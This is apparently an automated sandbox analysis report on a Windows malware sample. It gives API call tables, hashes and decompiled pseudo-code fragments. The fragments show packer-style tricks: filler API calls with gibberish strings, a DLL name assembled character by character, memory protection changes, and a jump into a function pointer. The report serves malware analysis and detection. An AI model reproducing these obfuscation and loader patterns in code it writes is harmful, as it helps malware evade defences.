                        0x0040625f
                        0x00406264
                        0x00406266
                        0x00406272
                        0x00406272
                        0x00406277
                        0x0040627e
                        0x00406281
                        0x00406288
                        0x0040629d
                        0x004062a4
                        0x004062ab
                        0x004062b1
                        0x004062b3
                        0x004062b5
                        0x004062b8
                        0x004062bd
                        0x004062bf
                        0x004062c0
                        0x004062c1
                        0x004062ce
                        0x004062e6
                        0x004062e9
                        0x004062ee
                        0x004062f8
                        0x004062f8
                        0x004062fd
                        0x004062ff
                        0x00406305
                        0x00406307
                        0x00406307
                        0x0040630c
                        0x00406314
                        0x0040631d
                        0x00406323
                        0x0040632d
                        0x00406338
                        0x00406341
                        0x00406341
                        0x00406347
                        0x00406348
                        0x00406348
                        0x00406307
                        0x00406350
                        0x00406352
                        0x00406352
                        0x0040635c
                        0x00406360
                        0x0040636b
                        0x0040637a
                        0x00406386
                        0x00406386
                        0x0040638c
                        0x0040638d
                        0x00406395
                        0x0040639b
                        0x004063a6
                        0x004063ab
                        0x004063ad
                        0x004063b2
                        0x004063b4
                        0x004063b7
                        0x004063c1
                        0x004063c1
                        0x004063c7
                        0x004063c8
                        0x004063d1
                        0x004063d2
                        0x004063d9
                        0x004063dc
                        0x004063e5
                        0x004063e5
                        0x004063f2
                        0x004063fe
                        0x00406404
                        0x00406404
                        0x0040640a
                        0x0040640a
                        0x00406412
                        0x0040641c
                        0x00406428

                        APIs
                        • __EH_prolog.LIBCMT ref: 00405A74
                        • GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
                        • VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
                        • GetLastError.KERNEL32 ref: 00405AB8
                        • GetProcessHandleCount.KERNELBASE(00000000,00000000,3686B744,274F0A8C,4AF4EDD1,4DD6C6EF,3A3F3A40,708C25B4,59D10E2F,36D67E57,3289BE56,4821AA3D,3A3F3A40,626E8506,626E8506,42D3B3FD), ref: 00406187
                          • Part of subcall function 00405A3C: __EH_prolog.LIBCMT ref: 00405A41
                        • GetSystemDefaultLCID.KERNEL32 ref: 0040618D
                        • GetVersionExW.KERNEL32(00000000), ref: 004061B9
                        • GetComputerNameA.KERNEL32 ref: 004061CD
                        • GlobalWire.KERNEL32 ref: 004061DA
                        • ResetEvent.KERNEL32(00000000), ref: 004061E1
                        • OpenWaitableTimerA.KERNEL32(00000000,00000000,padumojerupodivufojonabahusemufikeserivifaleb), ref: 004061EE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004061FC
                        • __wfopen_s.LIBCMT ref: 00406226
                        • _feof.LIBCMT ref: 0040622C
                        • _puts.LIBCMT ref: 00406252
                        • OleQueryCreateFromData.OLE32(00000000), ref: 00406281
                        • WinHttpCloseHandle.WINHTTP(00000000), ref: 00406288
                        • FoldStringW.KERNEL32(00000000,miputuwudukabocayuvehom,00000000,?,00000000), ref: 0040629D
                        • _feof.LIBCMT ref: 004062A4
                        • _fsetpos.LIBCMT ref: 004062AB
                        • _fprintf.LIBCMT ref: 004062C1
                        • GetLongPathNameA.KERNEL32 ref: 00406338
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00406341
                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000000), ref: 00406360
                        • AddAtomW.KERNEL32(Nalid cinunec), ref: 0040636B
                        • lstrcpynA.KERNEL32(?,00000000,00000000), ref: 0040637A
                        • SetFileShortNameW.KERNEL32(00000000,bawum), ref: 00406386
                        • GetFileType.KERNEL32(00000000), ref: 004063DC
                        • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004063E5
                        • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 004063FE
                        • GetUserDefaultLangID.KERNEL32 ref: 00406404
                        • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00406412
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: FileName$ConsoleCreateDefaultFindGlobalH_prologHandle_feof$AliasAllocAtomChangeCloseComputerCountCtrlDataErrorEventFirstFoldFromHandlerHttpLangLastLibraryLoadLongMutexNextNotificationOpenPathProcessProtectQueryResetShortStringSystemTimerTypeUserVersionVirtualWaitableWire__wfopen_s_fprintf_fsetpos_putslstrcpyn
                        • String ID: lJ$&v1>$/,cZ$0.txt$@:?:$Cah$Nalid cinunec$Tgt$bawum$j[aj$kq`E$miputuwudukabocayuvehom$msimg32.dll$padumojerupodivufojonabahusemufikeserivifaleb
                        • API String ID: 1493176409-4139528676
                        • Opcode ID: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
                        • Instruction ID: bb73222b721ae5790bf0f43ae7b398a59fbe0ad7c8ad8c6f35e93601ff7b34d9
                        • Opcode Fuzzy Hash: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
                        • Instruction Fuzzy Hash: 6F428AB5A01358DFCB24CFAADA896CEBBB4FF15354F504059F949AB610C7348A81CF89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 62 40d805-40d827 HeapCreate 63 40d829-40d82a 62->63 64 40d82b-40d834 62->64
                        C-Code - Quality: 100%
                        			E0040D805(intOrPtr _a4) {
                        				void* _t6;
                        
                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                        				 *0x42eb04 = _t6;
                        				if(_t6 != 0) {
                        					 *0x42f134 = 1;
                        					return 1;
                        				} else {
                        					return _t6;
                        				}
                        			}




                        0x0040d81a
                        0x0040d820
                        0x0040d827
                        0x0040d82e
                        0x0040d834
                        0x0040d82a
                        0x0040d82a
                        0x0040d82a

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D81A
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
                        • Instruction ID: fd85ce2fcb67921a389e6ce4cb0a7bbe92cde3a7c9e0599c9ee6dbe1732e0889
                        • Opcode Fuzzy Hash: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
                        • Instruction Fuzzy Hash: BAD0A732A513049FDB10AFB1BD097323BDCD3847A5F408436B90DD61A0F574ED52C648
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 65 409d17-409d19 call 409ca5 67 409d1e-409d1f 65->67
                        C-Code - Quality: 100%
                        			E00409D17() {
                        				void* _t1;
                        
                        				_t1 = E00409CA5(0); // executed
                        				return _t1;
                        			}




                        0x00409d19
                        0x00409d1f

                        APIs
                        • __encode_pointer.LIBCMT ref: 00409D19
                          • Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CB7
                          • Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000004,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CCE
                          • Part of subcall function 00409CA5: RtlEncodePointer.NTDLL(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409D0C
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: Value$EncodePointer__encode_pointer
                        • String ID:
                        • API String ID: 2585649348-0
                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction ID: a16bc2a155c058482eeeff35459f6d4b366902e2d4f8f65c91ebe27a5e0a607d
                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E004077DB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                        				intOrPtr _v0;
                        				void* _v804;
                        				intOrPtr _v808;
                        				intOrPtr _v812;
                        				intOrPtr _t6;
                        				intOrPtr _t11;
                        				intOrPtr _t12;
                        				intOrPtr _t13;
                        				long _t17;
                        				intOrPtr _t21;
                        				intOrPtr _t22;
                        				intOrPtr _t25;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				intOrPtr* _t31;
                        				void* _t34;
                        
                        				_t27 = __esi;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ecx;
                        				_t21 = __ebx;
                        				_t6 = __eax;
                        				_t34 = _t22 -  *0x42c770; // 0xd4647818
                        				if(_t34 == 0) {
                        					asm("repe ret");
                        				}
                        				 *0x42ec10 = _t6;
                        				 *0x42ec0c = _t22;
                        				 *0x42ec08 = _t25;
                        				 *0x42ec04 = _t21;
                        				 *0x42ec00 = _t27;
                        				 *0x42ebfc = _t26;
                        				 *0x42ec28 = ss;
                        				 *0x42ec1c = cs;
                        				 *0x42ebf8 = ds;
                        				 *0x42ebf4 = es;
                        				 *0x42ebf0 = fs;
                        				 *0x42ebec = gs;
                        				asm("pushfd");
                        				_pop( *0x42ec20);
                        				 *0x42ec14 =  *_t31;
                        				 *0x42ec18 = _v0;
                        				 *0x42ec24 =  &_a4;
                        				 *0x42eb60 = 0x10001;
                        				_t11 =  *0x42ec18; // 0x0
                        				 *0x42eb14 = _t11;
                        				 *0x42eb08 = 0xc0000409;
                        				 *0x42eb0c = 1;
                        				_t12 =  *0x42c770; // 0xd4647818
                        				_v812 = _t12;
                        				_t13 =  *0x42c774; // 0x2b9b87e7
                        				_v808 = _t13;
                        				 *0x42eb58 = IsDebuggerPresent();
                        				_push(1);
                        				E00409C9D(_t14);
                        				SetUnhandledExceptionFilter(0);
                        				_t17 = UnhandledExceptionFilter(0x402814);
                        				if( *0x42eb58 == 0) {
                        					_push(1);
                        					E00409C9D(_t17);
                        				}
                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                        			}



















                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077e1
                        0x004077e3
                        0x004077e3
                        0x0040d8d6
                        0x0040d8db
                        0x0040d8e1
                        0x0040d8e7
                        0x0040d8ed
                        0x0040d8f3
                        0x0040d8f9
                        0x0040d900
                        0x0040d907
                        0x0040d90e
                        0x0040d915
                        0x0040d91c
                        0x0040d923
                        0x0040d924
                        0x0040d92d
                        0x0040d935
                        0x0040d93d
                        0x0040d948
                        0x0040d952
                        0x0040d957
                        0x0040d95c
                        0x0040d966
                        0x0040d970
                        0x0040d975
                        0x0040d97b
                        0x0040d980
                        0x0040d98c
                        0x0040d991
                        0x0040d993
                        0x0040d99b
                        0x0040d9a6
                        0x0040d9b3
                        0x0040d9b5
                        0x0040d9b7
                        0x0040d9bc
                        0x0040d9d0

                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0040D986
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D99B
                        • UnhandledExceptionFilter.KERNEL32(00402814), ref: 0040D9A6
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D9C2
                        • TerminateProcess.KERNEL32(00000000), ref: 0040D9C9
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID:
                        • API String ID: 2579439406-0
                        • Opcode ID: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
                        • Instruction ID: fe692e2c2471a191408ecafd0a3b7612e04458c4672b6b453b9975c369e636a9
                        • Opcode Fuzzy Hash: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
                        • Instruction Fuzzy Hash: 39210775A04244CFD720DFA7EE49A443BE0FB08310F90443AE50AA72B1DBB46986CF5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 87%
                        			E0040573C(void* __ecx, unsigned int __edx, intOrPtr _a4) {
                        				void* _v6;
                        				struct _COORD _v8;
                        				unsigned int _v12;
                        				long _v16;
                        				long _v20;
                        				struct _INPUT_RECORD _v40;
                        				char _v1064;
                        				short _v3112;
                        				short _v5160;
                        				void* _t15;
                        				void* _t16;
                        				void* _t37;
                        				unsigned int _t42;
                        
                        				_t15 = E00406B10(0x1424);
                        				_t42 = __edx >> 3;
                        				if(_t42 > 0) {
                        					_t37 = __ecx;
                        					_v12 = _t42;
                        					do {
                        						if( *0x42e644 == 0x5d) {
                        							GlobalGetAtomNameA(0,  &_v1064, 0);
                        							PeekConsoleInputW(0,  &_v40, 0,  &_v20);
                        							GetPrivateProfileStringW(0, 0, 0, 0, 0, 0);
                        							GetShortPathNameW(L"rawurumuxe",  &_v3112, 0);
                        							__imp__GetConsoleAliasA(0, 0, 0, 0);
                        							_v8.X = 0;
                        							asm("stosw");
                        							WriteConsoleOutputCharacterW(0, L"yetuzohapimupukugegisufaxinu", 0, _v8,  &_v16);
                        							VirtualAlloc(0, 0, 0, 0);
                        							SearchPathA("kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu", "lohulomazuvepupanezewevewimafof", 0, 0, 0, 0);
                        							DeleteFileW(0);
                        							LoadLibraryW(L"genibutozetinoyegazuzatozes");
                        							IsBadCodePtr(0);
                        							GetModuleFileNameW(0,  &_v5160, 0);
                        							EnumResourceTypesA(0, 0, 0);
                        						}
                        						_t16 = E00405599(_t37, _a4, 0);
                        						_t37 = _t37 + 8;
                        						_t12 =  &_v12;
                        						 *_t12 = _v12 - 1;
                        					} while ( *_t12 != 0);
                        					return _t16;
                        				}
                        				return _t15;
                        			}
















                        0x00405744
                        0x0040574a
                        0x00405751
                        0x00405759
                        0x0040575b
                        0x0040575e
                        0x00405765
                        0x00405774
                        0x00405784
                        0x00405790
                        0x004057a3
                        0x004057ad
                        0x004057b5
                        0x004057bc
                        0x004057cc
                        0x004057d6
                        0x004057ea
                        0x004057f1
                        0x004057fc
                        0x00405803
                        0x00405812
                        0x0040581b
                        0x0040581b
                        0x00405826
                        0x0040582b
                        0x0040582e
                        0x0040582e
                        0x0040582e
                        0x00000000
                        0x00405838
                        0x0040583b

                        APIs
                        • GlobalGetAtomNameA.KERNEL32 ref: 00405774
                        • PeekConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405784
                        • GetPrivateProfileStringW.KERNEL32 ref: 00405790
                        • GetShortPathNameW.KERNEL32 ref: 004057A3
                        • GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057AD
                        • WriteConsoleOutputCharacterW.KERNEL32(00000000,yetuzohapimupukugegisufaxinu,00000000,?,?), ref: 004057CC
                        • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057D6
                        • SearchPathA.KERNEL32(kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu,lohulomazuvepupanezewevewimafof,00000000,00000000,00000000,00000000), ref: 004057EA
                        • DeleteFileW.KERNEL32(00000000), ref: 004057F1
                        • LoadLibraryW.KERNEL32(genibutozetinoyegazuzatozes), ref: 004057FC
                        • IsBadCodePtr.KERNEL32 ref: 00405803
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00405812
                        • EnumResourceTypesA.KERNEL32 ref: 0040581B
                        Strings
                        • lohulomazuvepupanezewevewimafof, xrefs: 004057E0
                        • yetuzohapimupukugegisufaxinu, xrefs: 004057C6
                        • genibutozetinoyegazuzatozes, xrefs: 004057F7
                        • kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu, xrefs: 004057E5
                        • rawurumuxe, xrefs: 0040579E
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: ConsoleName$FilePath$AliasAllocAtomCharacterCodeDeleteEnumGlobalInputLibraryLoadModuleOutputPeekPrivateProfileResourceSearchShortStringTypesVirtualWrite
                        • String ID: genibutozetinoyegazuzatozes$kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu$lohulomazuvepupanezewevewimafof$rawurumuxe$yetuzohapimupukugegisufaxinu
                        • API String ID: 2519718940-461694913
                        • Opcode ID: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
                        • Instruction ID: b0c5818164c8b2c279455538c364471d95fd1b1af7f0e09314901615d566d303
                        • Opcode Fuzzy Hash: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
                        • Instruction Fuzzy Hash: 68212872502524BBC711AB919E48CDF7F7CEF4A3917004076F64AF1461C6385685CBB9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 92%
                        			E00409E0C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				struct HINSTANCE__* _t23;
                        				intOrPtr _t28;
                        				intOrPtr _t32;
                        				intOrPtr _t45;
                        				void* _t46;
                        
                        				_t35 = __ebx;
                        				_push(0xc);
                        				_push(0x417988);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t44 = L"KERNEL32.DLL";
                        				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                        				if(_t23 == 0) {
                        					_t23 = E0040CC73(_t44);
                        				}
                        				 *(_t46 - 0x1c) = _t23;
                        				_t45 =  *((intOrPtr*)(_t46 + 8));
                        				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402798;
                        				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                        				if(_t23 != 0) {
                        					_t35 = GetProcAddress;
                        					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                        					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                        				}
                        				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                        				 *((char*)(_t45 + 0xc8)) = 0x43;
                        				 *((char*)(_t45 + 0x14b)) = 0x43;
                        				 *(_t45 + 0x68) = 0x42cc70;
                        				E0040DB4D(_t35, 1, 0xd);
                        				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                        				InterlockedIncrement( *(_t45 + 0x68));
                        				 *(_t46 - 4) = 0xfffffffe;
                        				E00409EE1();
                        				E0040DB4D(_t35, 1, 0xc);
                        				 *(_t46 - 4) = 1;
                        				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                        				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                        				if(_t28 == 0) {
                        					_t32 =  *0x42d278; // 0x42d1a0
                        					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                        				}
                        				E0040F2F9( *((intOrPtr*)(_t45 + 0x6c)));
                        				 *(_t46 - 4) = 0xfffffffe;
                        				return E0040C16D(E00409EEA());
                        			}








                        0x00409e0c
                        0x00409e0c
                        0x00409e0e
                        0x00409e13
                        0x00409e18
                        0x00409e1e
                        0x00409e26
                        0x00409e29
                        0x00409e2e
                        0x00409e2f
                        0x00409e32
                        0x00409e35
                        0x00409e3f
                        0x00409e44
                        0x00409e4c
                        0x00409e54
                        0x00409e64
                        0x00409e64
                        0x00409e6a
                        0x00409e6d
                        0x00409e74
                        0x00409e7b
                        0x00409e84
                        0x00409e8a
                        0x00409e91
                        0x00409e97
                        0x00409e9e
                        0x00409ea5
                        0x00409eab
                        0x00409eae
                        0x00409eb1
                        0x00409eb6
                        0x00409eb8
                        0x00409ebd
                        0x00409ebd
                        0x00409ec3
                        0x00409ec9
                        0x00409eda

                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00417988,0000000C,00409F47,00000000,00000000), ref: 00409E1E
                        • __crt_waiting_on_module_handle.LIBCMT ref: 00409E29
                          • Part of subcall function 0040CC73: Sleep.KERNEL32(000003E8,00000000,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC7F
                          • Part of subcall function 0040CC73: GetModuleHandleW.KERNEL32(?,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC88
                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00409E52
                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409E62
                        • __lock.LIBCMT ref: 00409E84
                        • InterlockedIncrement.KERNEL32(0042CC70), ref: 00409E91
                        • __lock.LIBCMT ref: 00409EA5
                        • ___addlocaleref.LIBCMT ref: 00409EC3
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                        • API String ID: 1028249917-2843748187
                        • Opcode ID: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
                        • Instruction ID: 6ad4f0a12971139d9532a4c3a171173a4d2e78e68cd5d816e784cf29c2ced9c8
                        • Opcode Fuzzy Hash: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
                        • Instruction Fuzzy Hash: FC116D71940701DAE720EF76D945B5ABBE0AF05314F10453EE499B62E1CB78A940CF5C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 356 40563b-405641 SetVolumeMountPointA 357 405647-40567d 356->357 358 4056be-405729 357->358 359 40567f-4056b8 WaitNamedPipeW ReadConsoleInputW CreateEventA OpenWaitableTimerA InterlockedCompareExchange 357->359 360 4055e4-4055fe 358->360 361 40572f-40573b 358->361 359->358 362 405600-405608 FindNextFileW 360->362 363 40560e-40561e 360->363 362->363 364 405620 363->364 365 40562a-40562f 363->365 364->365 365->357 366 405631-40563a SetSystemTimeAdjustment 365->366 366->356
                        APIs
                        • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 0040563B
                        • WaitNamedPipeW.KERNEL32(luhovire,00000000), ref: 00405685
                        • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405695
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040569F
                        • OpenWaitableTimerA.KERNEL32(00000000,00000000,Camivanihaza dulaxow), ref: 004056AC
                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004056B8
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: CompareConsoleCreateEventExchangeInputInterlockedMountNamedOpenPipePointReadTimerVolumeWaitWaitable
                        • String ID: Camivanihaza dulaxow$luhovire
                        • API String ID: 3983037427-2293185549
                        • Opcode ID: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
                        • Instruction ID: e0417459ce5708b3d2944c1299cadaac4ca3c3044ba0b9f4daa45e8deca22c17
                        • Opcode Fuzzy Hash: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
                        • Instruction Fuzzy Hash: EA41C3B1E01219EFCB50CFA9DA899DEBBB4FF19314F50406AE515F2250D3349A41CFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 44%
                        			E00406429(void* __eflags) {
                        				char _v2048;
                        				intOrPtr _t2;
                        				short _t4;
                        				short _t5;
                        				short _t7;
                        				short _t8;
                        				short _t9;
                        				short _t10;
                        				short _t11;
                        				short _t12;
                        				short _t13;
                        				short _t14;
                        				intOrPtr* _t21;
                        				void* _t24;
                        				void* _t32;
                        
                        				_t2 =  *0x41c7ac; // 0xfff5ca55
                        				 *0x42e644 = _t2;
                        				 *0x42e644 =  *0x42e644 + 0xb2d3b;
                        				_t4 = 0x6e;
                        				 *0x42dcde = _t4;
                        				_t5 = 0x33;
                        				 *0x42dce4 = _t5;
                        				 *0x42dcf0 = 0;
                        				_t7 = 0x2e;
                        				 *0x42dce8 = _t7;
                        				_t8 = 0x6b;
                        				 *0x42dcd8 = _t8;
                        				_t9 = 0x6c;
                        				 *0x42dcec = _t9;
                        				_t10 = 0x64;
                        				 *0x42dcea = _t10;
                        				_t11 = 0x6c;
                        				 *0x42dcee = _t11;
                        				 *0x42dce2 = _t11;
                        				_t12 = 0x32;
                        				 *0x42dce6 = _t12;
                        				_t13 = 0x65;
                        				 *0x42dcda = _t13;
                        				 *0x42dce0 = _t13;
                        				_t14 = 0x72;
                        				 *0x42dcdc = _t14;
                        				E00405A6B(_t32);
                        				_t24 = 0x184cc;
                        				do {
                        					if( *0x42e644 == 0x1833b) {
                        						__imp__GetVolumePathNameW(L"nulunowuyekufuneyaxesor",  &_v2048, 0);
                        						FindFirstChangeNotificationW(0, 0, 0);
                        						GetFileAttributesA(0);
                        						SetComputerNameA("Basiyixeyifopug saluzoha");
                        						__imp__SetCalendarInfoW(0, 0, 0, 0);
                        						GetFileType(0);
                        						__imp__SetFileShortNameW(0, 0);
                        					}
                        					_t24 = _t24 - 1;
                        				} while (_t24 != 0);
                        				_t21 =  *0x42dc24; // 0x6ef814
                        				 *0x42dccc = _t21;
                        				 *_t21();
                        				return 0;
                        			}


















                        0x00406429
                        0x00406436
                        0x00406440
                        0x00406448
                        0x0040644b
                        0x00406451
                        0x00406454
                        0x0040645c
